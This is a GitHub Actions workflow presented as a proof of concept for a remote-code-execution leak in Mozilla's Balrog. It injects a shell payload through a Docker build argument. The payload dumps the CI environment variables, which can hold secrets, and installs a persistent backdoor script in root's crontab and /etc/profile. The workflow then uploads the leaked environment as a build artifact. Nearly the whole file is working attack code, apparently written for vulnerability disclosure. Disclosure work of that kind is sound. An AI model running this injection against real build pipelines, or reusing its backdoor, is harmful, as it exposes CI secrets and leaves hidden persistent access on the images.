name: Mozilla Balrog RCE Leak PoC

on: [push]

jobs:
  exploit:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Leak via Dockerfile Injection
        run: |
          PAYLOAD=$(cat <<'EOF'
          echo "[*] Dumping CI ENV..." && printenv > /leaked.txt
          echo "[*] Installing runtime backdoor..."
          echo '#!/bin/sh' > /usr/local/bin/init.sh
          echo 'echo "[*] Backdoor triggered" >> /runtime.log' >> /usr/local/bin/init.sh
          echo 'printenv >> /runtime.log' >> /usr/local/bin/init.sh
          chmod +x /usr/local/bin/init.sh
          echo '@reboot /usr/local/bin/init.sh' >> /etc/crontabs/root
          echo '/usr/local/bin/init.sh' >> /etc/profile
          EOF
          )

          docker build \
            --build-arg PYTHON_VERSION="$PAYLOAD" \
            -t test-injected ./taskcluster/docker/python

          docker run --rm test-injected cat /leaked.txt > output.txt

      - name: Upload Leak
        uses: actions/upload-artifact@v4
        with:
          name: simulated-leak
          path: output.txt
